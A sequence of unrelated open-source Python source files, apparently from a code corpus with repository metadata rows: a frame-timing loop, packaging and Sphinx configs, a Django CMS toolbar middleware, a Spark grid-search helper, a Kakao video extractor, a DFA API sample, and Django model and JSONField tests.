self.previous_time = time.time() - self.period # Previous time is one frame ago to trigger immediately
return self.period
def get_frame(self, timestamp):
return int((timestamp - self.start_time) // self.period)
def is_running(self):
return self.running
def run(self):
self.running = True
try:
while self.is_running() and self.period:
self.current_time = time.time()
current_frame = self.get_frame(self.current_time)
previous_frame = self.get_frame(self.previous_time)
for frame in range(previous_frame, current_frame):
self.render(frame + 1)
self.previous_time = self.current_time
sleep_time = (self.start_time + (self.period * (current_frame + 1)) - time.time()) * self.sleep_factor
if sleep_time > 0:
time.sleep(sleep_time)
except KeyboardInterrupt:
pass
except self.LoopInterruptException:
pass
self.close()
def close(self):
pass
def render(self, frame):
"""
This method is to be overridden under normal operation.
The implementation here is useful for measuring the accuracy of the rendered frames.
self.profile_timelog contains the time the redered frame was out from it's expected time.
This is useful to run and average
"""
#print('{0} {1}'.format(frame, time.time()))
self.profile_timelog.append(self.current_time - (self.start_time + (self.period * frame)))
if frame > (self.fps*20):
average_frame_inacuracy = sum(self.profile_timelog)/len(self.profile_timelog)
average_off_percent = average_frame_inacuracy / self.period
variance = max(self.profile_timelog) - min(self.profile_timelog)
print('average_frame_inacuracy: {0} average_off_percent: {1:.2%} variance: {2}'.format(average_frame_inacuracy, average_off_percent, variance))
self.running = False
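# Sketch of the intended use: subclass and override render(). The printed format and
# the two-second frame budget are illustrative choices, not part of the class API.
class PrintLoop(Loop):
    def render(self, frame):
        print('frame {0} at {1:.3f}s'.format(frame, self.current_time - self.start_time))
        if frame >= self.fps * 2:
            self.running = False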
if __name__ == "__main__":
    Loop(60).run()
| calaldees/libs | python3/calaldees/loop.py | Python | gpl-3.0 | 2,814 | 0.002843 |
import os
import sys
from setuptools import setup, find_packages, Command
from commands import *
tests_require=['pytest-cov', 'pytest', 'testfixtures']
setup(
name=name,
version=read_version(),
description='A regex based file organizer',
long_description=open(os.path.join(base_dir, 'description.txt')).read().strip(),
license='MPL',
url='https://github.com/chriscz/pySorter',
author='Chris Coetzee',
author_email='chriscz93@gmail.com',
packages=find_packages(),
setup_requires=['pytest-runner'],
tests_require=tests_require,
include_package_data=True,
zip_safe=False,
cmdclass={
'test': PyTestCommand,
'coverage': CoverageCommand,
'bump': BumpVersionCommand,
},
entry_points={
"console_scripts": ['pysorter=pysorter.commandline:main']
},
extras_require=dict(
build=['twine', 'wheel', 'setuptools-git', 'sphinx'],
test=['pytest', 'testfixtures', 'pytest-cov'],
),
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)",
"Topic :: Utilities",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
]
)
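# Typical invocations for this setup script (command names follow the cmdclass
# mapping above):
#   python setup.py test        # run the pytest suite
#   python setup.py coverage    # run the suite under coverage
#   python setup.py bump        # bump the package version
#   pip install .               # installs the `pysorter` console script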
| chriscz/pySorter | setup.py | Python | gpl-3.0 | 1,350 | 0.001481 |
from lacuna.building import MyBuilding
class ssld(MyBuilding):
path = 'ssld'
def __init__( self, client, body_id:int = 0, building_id:int = 0 ):
super().__init__( client, body_id, building_id )
| tmtowtdi/MontyLacuna | lib/lacuna/buildings/boring/ssld.py | Python | mit | 213 | 0.032864 |
# -*- coding: utf-8 -*-
"""
Edit Toolbar middleware
"""
from cms.utils.conf import get_cms_setting
from cms.toolbar.toolbar import CMSToolbar
from cms.utils.i18n import force_language
from django.contrib.admin.models import LogEntry, ADDITION, CHANGE
from menus.menu_pool import menu_pool
from django.http import HttpResponse
from django.template.loader import render_to_string
from cms.utils.placeholder import get_toolbar_plugin_struct
def toolbar_plugin_processor(instance, placeholder, rendered_content, original_context):
from cms.plugin_pool import plugin_pool
original_context.push()
child_plugin_classes = []
plugin_class = instance.get_plugin_class()
if plugin_class.allow_children:
inst, plugin = instance.get_plugin_instance()
page = original_context['request'].current_page
children = [plugin_pool.get_plugin(cls) for cls in plugin.get_child_classes(placeholder, page)]
# Builds the list of dictionaries containing module, name and value for the plugin dropdowns
child_plugin_classes = get_toolbar_plugin_struct(children, placeholder.slot, placeholder.page,
parent=plugin_class)
instance.placeholder = placeholder
request = original_context['request']
with force_language(request.toolbar.toolbar_language):
data = {
'instance': instance,
'rendered_content': rendered_content,
'child_plugin_classes': child_plugin_classes,
'edit_url': placeholder.get_edit_url(instance.pk),
'add_url': placeholder.get_add_url(),
'delete_url': placeholder.get_delete_url(instance.pk),
'move_url': placeholder.get_move_url(),
}
original_context.update(data)
plugin_class = instance.get_plugin_class()
template = plugin_class.frontend_edit_template
output = render_to_string(template, original_context).strip()
original_context.pop()
return output
class ToolbarMiddleware(object):
"""
Middleware to set up CMS Toolbar.
"""
def process_request(self, request):
"""
If we should show the toolbar for this request, put it on
request.toolbar. Then call the request_hook on the toolbar.
"""
edit_on = get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')
edit_off = get_cms_setting('CMS_TOOLBAR_URL__EDIT_OFF')
build = get_cms_setting('CMS_TOOLBAR_URL__BUILD')
if request.user.is_staff or request.user.is_anonymous():
if edit_on in request.GET and not request.session.get('cms_edit', False):
if not request.session.get('cms_edit', False):
menu_pool.clear()
request.session['cms_edit'] = True
if request.session.get('cms_build', False):
request.session['cms_build'] = False
if edit_off in request.GET and request.session.get('cms_edit', True):
if request.session.get('cms_edit', True):
menu_pool.clear()
request.session['cms_edit'] = False
if request.session.get('cms_build', False):
request.session['cms_build'] = False
if build in request.GET and not request.session.get('cms_build', False):
request.session['cms_build'] = True
else:
request.session['cms_build'] = False
request.session['cms_edit'] = False
if request.user.is_staff:
try:
request.cms_latest_entry = LogEntry.objects.filter(
user=request.user,
action_flag__in=(ADDITION, CHANGE)
).only('pk').order_by('-pk')[0].pk
except IndexError:
request.cms_latest_entry = -1
request.toolbar = CMSToolbar(request)
def process_view(self, request, view_func, view_args, view_kwarg):
response = request.toolbar.request_hook()
if isinstance(response, HttpResponse):
return response
def process_response(self, request, response):
from django.utils.cache import add_never_cache_headers
found = False
if hasattr(request, 'toolbar') and request.toolbar.edit_mode:
found = True
for placeholder in getattr(request, 'placeholders', []):
if not placeholder.cache_placeholder:
found = True
break
if found:
add_never_cache_headers(response)
if hasattr(request, 'user') and request.user.is_staff and response.status_code != 500:
try:
pk = LogEntry.objects.filter(
user=request.user,
action_flag__in=(ADDITION, CHANGE)
).only('pk').order_by('-pk')[0].pk
if hasattr(request, 'cms_latest_entry') and request.cms_latest_entry != pk:
log = LogEntry.objects.filter(user=request.user, action_flag__in=(ADDITION, CHANGE))[0]
request.session['cms_log_latest'] = log.pk
# If there were no LogEntries, just don't touch the session.
# Note that in the case of a user logging-in as another user,
# request may have a cms_latest_entry attribute, but there are no
# LogEntries for request.user.
except IndexError:
pass
return response
| vstoykov/django-cms | cms/middleware/toolbar.py | Python | bsd-3-clause | 5,441 | 0.001838 |
"""
Gridsearch implementation
"""
from hops import hdfs, tensorboard, devices
from hops.experiment_impl.util import experiment_utils
from hops.experiment import Direction
import threading
import six
import time
import os
def _run(sc, train_fn, run_id, args_dict, direction=Direction.MAX, local_logdir=False, name="no-name", optimization_key=None):
"""
Run the wrapper function with each hyperparameter combination as specified by the dictionary
Args:
sc:
train_fn:
args_dict:
direction:
local_logdir:
name:
Returns:
"""
app_id = str(sc.applicationId)
num_executions = 1
if direction.upper() != Direction.MAX and direction.upper() != Direction.MIN:
raise ValueError('Invalid direction ' + direction + ', must be Direction.MAX or Direction.MIN')
arg_lists = list(args_dict.values())
currentLen = len(arg_lists[0])
for i in range(len(arg_lists)):
if currentLen != len(arg_lists[i]):
raise ValueError('Length of each function argument list must be equal')
num_executions = len(arg_lists[i])
#Each TF task should be run on 1 executor
nodeRDD = sc.parallelize(range(num_executions), num_executions)
#Make SparkUI intuitive by grouping jobs
sc.setJobGroup(os.environ['ML_ID'], "{} | Grid Search".format(name))
#Force execution on executor, since GPU is located on executor
nodeRDD.foreachPartition(_prepare_func(app_id, run_id, train_fn, args_dict, local_logdir, optimization_key))
arg_count = six.get_function_code(train_fn).co_argcount
arg_names = six.get_function_code(train_fn).co_varnames
exp_dir = experiment_utils._get_logdir(app_id, run_id)
max_val, max_hp, min_val, min_hp, avg, max_return_dict, min_return_dict = experiment_utils._get_best(args_dict, num_executions, arg_names, arg_count, exp_dir, optimization_key)
param_combination = ""
best_val = ""
return_dict = {}
if direction.upper() == Direction.MAX:
param_combination = max_hp
best_val = str(max_val)
return_dict = max_return_dict
elif direction.upper() == Direction.MIN:
param_combination = min_hp
best_val = str(min_val)
return_dict = min_return_dict
print('Finished Experiment \n')
best_dir = exp_dir + '/' + param_combination
return best_dir, experiment_utils._get_params_dict(best_dir), best_val, return_dict
def _prepare_func(app_id, run_id, train_fn, args_dict, local_logdir, optimization_key):
"""
Args:
app_id:
run_id:
train_fn:
args_dict:
local_logdir:
Returns:
"""
def _wrapper_fun(iter):
"""
Args:
iter:
Returns:
"""
for i in iter:
executor_num = i
experiment_utils._set_ml_id(app_id, run_id)
tb_hdfs_path = ''
hdfs_exec_logdir = ''
t = threading.Thread(target=devices._print_periodic_gpu_utilization)
if devices.get_num_gpus() > 0:
t.start()
try:
#Arguments
if args_dict:
param_string, params, args = experiment_utils.build_parameters(train_fn, executor_num, args_dict)
hdfs_exec_logdir, hdfs_appid_logdir = experiment_utils._create_experiment_subdirectories(app_id, run_id, param_string, 'grid_search', params=params)
logfile = experiment_utils._init_logger(hdfs_exec_logdir)
tb_hdfs_path, tb_pid = tensorboard._register(hdfs_exec_logdir, hdfs_appid_logdir, executor_num, local_logdir=local_logdir)
print(devices._get_gpu_info())
print('-------------------------------------------------------')
print('Started running task ' + param_string)
task_start = time.time()
retval = train_fn(*args)
task_end = time.time()
experiment_utils._handle_return(retval, hdfs_exec_logdir, optimization_key, logfile)
time_str = 'Finished task ' + param_string + ' - took ' + experiment_utils._time_diff(task_start, task_end)
print(time_str)
print('Returning metric ' + str(retval))
print('-------------------------------------------------------')
except:
raise
finally:
experiment_utils._cleanup(tensorboard, t)
return _wrapper_fun | hopshadoop/hops-util-py | hops/experiment_impl/parallel/grid_search.py | Python | apache-2.0 | 4,463 | 0.005602 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# TWX documentation build configuration file, created by
# sphinx-quickstart on Sat Jun 27 15:07:02 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'TWX'
copyright = '2015, Vince Castellano, Phillip Lopo'
author = 'Vince Castellano, Phillip Lopo'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0b3'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
html_theme_options = {
'github_user': 'datamachine',
'github_repo': 'twx',
'description': 'Telegram Bot API and MTProto Clients',
'github_banner': True,
'github_button': True,
'show_powered_by': False,
#'link': '#0088cc',
#'sidebar_link': '#0088cc',
#'anchor': '#0088cc',
'gray_1': '#0088cc',
'gray_2': '#ecf3f8',
#'gray_3': '#0088cc',
#'pre_bg': '#ecf3f8',
#'font_family': "'Lucida Grande', 'Lucida Sans Unicode', Arial, Helvetica, Verdana, sans-serif",
#'head_font_family': "'Lucida Grande', 'Lucida Sans Unicode', Arial, Helvetica, Verdana, sans-serif"
}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'TWXdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'TWX.tex', 'TWX Documentation',
'Vince Castellano, Phillip Lopo', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'twx', 'TWX Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'TWX', 'TWX Documentation',
author, 'TWX', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
| datamachine/twx | docs/conf.py | Python | mit | 10,106 | 0.006333 |
#!/usr/bin/env python
from ..common import *
from .universal import *
__all__ = ['kakao_download']
def kakao_download(url, output_dir='.', info_only=False, **kwargs):
json_request_url = 'https://videofarm.daum.net/controller/api/closed/v1_2/IntegratedMovieData.json?vid={}'
    # Playlists are not supported in this implementation, so the playlist part of
    # the URL is stripped; to support playlists this would need to change.
if re.search('playlistId', url):
url = re.search(r"(.+)\?.+?", url).group(1)
page = get_content(url)
try:
vid = re.search(r"<meta name=\"vid\" content=\"(.+)\">", page).group(1)
title = re.search(r"<meta name=\"title\" content=\"(.+)\">", page).group(1)
meta_str = get_content(json_request_url.format(vid))
meta_json = json.loads(meta_str)
standard_preset = meta_json['output_list']['standard_preset']
output_videos = meta_json['output_list']['output_list']
size = ''
if meta_json['svcname'] == 'smr_pip':
for v in output_videos:
if v['preset'] == 'mp4_PIP_SMR_480P':
size = int(v['filesize'])
break
else:
for v in output_videos:
if v['preset'] == standard_preset:
size = int(v['filesize'])
break
video_url = meta_json['location']['url']
print_info(site_info, title, 'mp4', size)
if not info_only:
download_urls([video_url], title, 'mp4', size, output_dir, **kwargs)
except:
universal_download(url, output_dir, merge=kwargs['merge'], info_only=info_only, **kwargs)
site_info = "tv.kakao.com"
download = kakao_download
download_playlist = playlist_not_supported('kakao')
| xyuanmu/you-get | src/you_get/extractors/kakao.py | Python | mit | 1,771 | 0.002823 |
#!/usr/bin/python
#
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example downloads activity tags for a given floodlight activity."""
import argparse
import sys
from apiclient import sample_tools
from oauth2client import client
# Declare command-line flags.
argparser = argparse.ArgumentParser(add_help=False)
argparser.add_argument(
'profile_id', type=int,
help='The ID of the profile to download tags for')
argparser.add_argument(
'activity_id', type=int,
help='The ID of the floodlight activity to download tags for')
def main(argv):
# Authenticate and construct service.
service, flags = sample_tools.init(
argv, 'dfareporting', 'v2.0', __doc__, __file__, parents=[argparser],
scope=['https://www.googleapis.com/auth/dfareporting',
'https://www.googleapis.com/auth/dfatrafficking'])
profile_id = flags.profile_id
activity_id = flags.activity_id
try:
# Construct the request.
request = service.floodlightActivities().generatetag(
profileId=profile_id, floodlightActivityId=activity_id)
# Execute request and print response.
response = request.execute()
print response['floodlightActivityTag']
except client.AccessTokenRefreshError:
print ('The credentials have been revoked or expired, please re-run the '
'application to re-authorize')
if __name__ == '__main__':
main(sys.argv)
| falbassini/googleads-dfa-reporting-samples | python/v2.0/download_floodlight_tag.py | Python | apache-2.0 | 1,952 | 0.004098 |
from flask import url_for
from tests import ZKWTestCase
from zkw.models import Sourdough, User
class SourdoughDetailsPageTests(ZKWTestCase):
def setUp(self):
super(SourdoughDetailsPageTests, self).setUp()
self.user_1 = User.get_by_email('user_1@example.com')
self.active_sd = Sourdough.query.filter_by(name='Arnulf').first()
self.active_sd_url = url_for('sd.details', sourdough_id=self.active_sd.id)
self.inactive_sd = Sourdough.query.filter_by(name='inactive').first()
self.inactive_sd_url = url_for('sd.details', sourdough_id=self.inactive_sd.id)
def test_anon_inactive_page(self):
"""
Test what anonymous user sees when she tries to access inactive sourdough page.
Expected outcome: HTTP 404
"""
with self.app.test_client() as client:
rv = client.get(self.inactive_sd_url)
self.assert404(rv)
def test_loggedin_inactive_page(self):
"""
Test what logged in user sees when she tries to access inactive sourdough page.
Expected outcome: sourdough details page without form
"""
action_text = 'action="%s"' % self.inactive_sd_url
with self.app.test_client() as client:
self.login(client, self.user_1.email)
rv = client.get(self.inactive_sd_url)
self.assert200(rv)
page = self.page_content(rv)
self.assertNotIn(action_text, page)
def test_owner_inactive_page(self):
"""
Test what owner sees when she tries to access inactive sourdough page.
Expected outcome: sourdough details page with form
"""
action_text = 'action="%s"' % self.inactive_sd_url
with self.app.test_client() as client:
self.login(client, self.inactive_sd.user.email)
rv = client.get(self.inactive_sd_url)
self.assert200(rv)
page = self.page_content(rv)
self.assertIn(action_text, page)
| zgoda/zakwasy | tests/test_sddetails.py | Python | mit | 2,004 | 0.001996 |
import datetime
import uuid
from decimal import Decimal
from django.core import checks, exceptions, serializers
from django.core.serializers.json import DjangoJSONEncoder
from django.forms import CharField, Form, widgets
from django.test.utils import isolate_apps
from django.utils.html import escape
from . import PostgreSQLTestCase
from .models import JSONModel, PostgreSQLModel
try:
from django.contrib.postgres import forms
from django.contrib.postgres.fields import JSONField
except ImportError:
pass
class TestSaveLoad(PostgreSQLTestCase):
def test_null(self):
instance = JSONModel()
instance.save()
loaded = JSONModel.objects.get()
self.assertIsNone(loaded.field)
def test_empty_object(self):
instance = JSONModel(field={})
instance.save()
loaded = JSONModel.objects.get()
self.assertEqual(loaded.field, {})
def test_empty_list(self):
instance = JSONModel(field=[])
instance.save()
loaded = JSONModel.objects.get()
self.assertEqual(loaded.field, [])
def test_boolean(self):
instance = JSONModel(field=True)
instance.save()
loaded = JSONModel.objects.get()
self.assertIs(loaded.field, True)
def test_string(self):
instance = JSONModel(field='why?')
instance.save()
loaded = JSONModel.objects.get()
self.assertEqual(loaded.field, 'why?')
def test_number(self):
instance = JSONModel(field=1)
instance.save()
loaded = JSONModel.objects.get()
self.assertEqual(loaded.field, 1)
def test_realistic_object(self):
obj = {
'a': 'b',
'c': 1,
'd': ['e', {'f': 'g'}],
'h': True,
'i': False,
'j': None,
}
instance = JSONModel(field=obj)
instance.save()
loaded = JSONModel.objects.get()
self.assertEqual(loaded.field, obj)
def test_custom_encoding(self):
"""
JSONModel.field_custom has a custom DjangoJSONEncoder.
"""
some_uuid = uuid.uuid4()
obj_before = {
'date': datetime.date(2016, 8, 12),
'datetime': datetime.datetime(2016, 8, 12, 13, 44, 47, 575981),
'decimal': Decimal('10.54'),
'uuid': some_uuid,
}
obj_after = {
'date': '2016-08-12',
'datetime': '2016-08-12T13:44:47.575',
'decimal': '10.54',
'uuid': str(some_uuid),
}
JSONModel.objects.create(field_custom=obj_before)
loaded = JSONModel.objects.get()
self.assertEqual(loaded.field_custom, obj_after)
class TestQuerying(PostgreSQLTestCase):
@classmethod
def setUpTestData(cls):
cls.objs = [
JSONModel.objects.create(field=None),
JSONModel.objects.create(field=True),
JSONModel.objects.create(field=False),
JSONModel.objects.create(field='yes'),
JSONModel.objects.create(field=7),
JSONModel.objects.create(field=[]),
JSONModel.objects.create(field={}),
JSONModel.objects.create(field={
'a': 'b',
'c': 1,
}),
JSONModel.objects.create(field={
'a': 'b',
'c': 1,
'd': ['e', {'f': 'g'}],
'h': True,
'i': False,
'j': None,
'k': {'l': 'm'},
}),
JSONModel.objects.create(field=[1, [2]]),
JSONModel.objects.create(field={
'k': True,
'l': False,
}),
JSONModel.objects.create(field={'foo': 'bar'}),
]
def test_exact(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__exact={}),
[self.objs[6]]
)
def test_exact_complex(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__exact={'a': 'b', 'c': 1}),
[self.objs[7]]
)
def test_isnull(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__isnull=True),
[self.objs[0]]
)
def test_isnull_key(self):
# key__isnull works the same as has_key='key'.
self.assertSequenceEqual(
JSONModel.objects.filter(field__a__isnull=True),
self.objs[:7] + self.objs[9:]
)
self.assertSequenceEqual(
JSONModel.objects.filter(field__a__isnull=False),
[self.objs[7], self.objs[8]]
)
def test_contains(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__contains={'a': 'b'}),
[self.objs[7], self.objs[8]]
)
def test_contained_by(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__contained_by={'a': 'b', 'c': 1, 'h': True}),
[self.objs[6], self.objs[7]]
)
def test_has_key(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__has_key='a'),
[self.objs[7], self.objs[8]]
)
def test_has_keys(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__has_keys=['a', 'c', 'h']),
[self.objs[8]]
)
def test_has_any_keys(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__has_any_keys=['c', 'l']),
[self.objs[7], self.objs[8], self.objs[10]]
)
def test_shallow_list_lookup(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__0=1),
[self.objs[9]]
)
def test_shallow_obj_lookup(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__a='b'),
[self.objs[7], self.objs[8]]
)
def test_deep_lookup_objs(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__k__l='m'),
[self.objs[8]]
)
def test_shallow_lookup_obj_target(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__k={'l': 'm'}),
[self.objs[8]]
)
def test_deep_lookup_array(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__1__0=2),
[self.objs[9]]
)
def test_deep_lookup_mixed(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__d__1__f='g'),
[self.objs[8]]
)
def test_deep_lookup_transform(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__c__gt=1),
[]
)
self.assertSequenceEqual(
JSONModel.objects.filter(field__c__lt=5),
[self.objs[7], self.objs[8]]
)
def test_usage_in_subquery(self):
self.assertSequenceEqual(
JSONModel.objects.filter(id__in=JSONModel.objects.filter(field__c=1)),
self.objs[7:9]
)
def test_iexact(self):
self.assertTrue(JSONModel.objects.filter(field__foo__iexact='BaR').exists())
self.assertFalse(JSONModel.objects.filter(field__foo__iexact='"BaR"').exists())
def test_icontains(self):
self.assertFalse(JSONModel.objects.filter(field__foo__icontains='"bar"').exists())
def test_startswith(self):
self.assertTrue(JSONModel.objects.filter(field__foo__startswith='b').exists())
def test_istartswith(self):
self.assertTrue(JSONModel.objects.filter(field__foo__istartswith='B').exists())
def test_endswith(self):
self.assertTrue(JSONModel.objects.filter(field__foo__endswith='r').exists())
def test_iendswith(self):
self.assertTrue(JSONModel.objects.filter(field__foo__iendswith='R').exists())
def test_regex(self):
self.assertTrue(JSONModel.objects.filter(field__foo__regex=r'^bar$').exists())
def test_iregex(self):
self.assertTrue(JSONModel.objects.filter(field__foo__iregex=r'^bAr$').exists())
@isolate_apps('postgres_tests')
class TestChecks(PostgreSQLTestCase):
def test_invalid_default(self):
class MyModel(PostgreSQLModel):
field = JSONField(default={})
model = MyModel()
self.assertEqual(model.check(), [
checks.Warning(
msg=(
"JSONField default should be a callable instead of an "
"instance so that it's not shared between all field "
"instances."
),
hint='Use a callable instead, e.g., use `dict` instead of `{}`.',
obj=MyModel._meta.get_field('field'),
id='postgres.E003',
)
])
def test_valid_default(self):
class MyModel(PostgreSQLModel):
field = JSONField(default=dict)
model = MyModel()
self.assertEqual(model.check(), [])
def test_valid_default_none(self):
class MyModel(PostgreSQLModel):
field = JSONField(default=None)
model = MyModel()
self.assertEqual(model.check(), [])
class TestSerialization(PostgreSQLTestCase):
test_data = (
'[{"fields": {"field": {"a": "b", "c": null}, "field_custom": null}, '
'"model": "postgres_tests.jsonmodel", "pk": null}]'
)
def test_dumping(self):
instance = JSONModel(field={'a': 'b', 'c': None})
data = serializers.serialize('json', [instance])
self.assertJSONEqual(data, self.test_data)
def test_loading(self):
instance = list(serializers.deserialize('json', self.test_data))[0].object
self.assertEqual(instance.field, {'a': 'b', 'c': None})
class TestValidation(PostgreSQLTestCase):
def test_not_serializable(self):
field = JSONField()
with self.assertRaises(exceptions.ValidationError) as cm:
field.clean(datetime.timedelta(days=1), None)
self.assertEqual(cm.exception.code, 'invalid')
self.assertEqual(cm.exception.message % cm.exception.params, "Value must be valid JSON.")
def test_custom_encoder(self):
with self.assertRaisesMessage(ValueError, "The encoder parameter must be a callable object."):
field = JSONField(encoder=DjangoJSONEncoder())
field = JSONField(encoder=DjangoJSONEncoder)
self.assertEqual(field.clean(datetime.timedelta(days=1), None), datetime.timedelta(days=1))
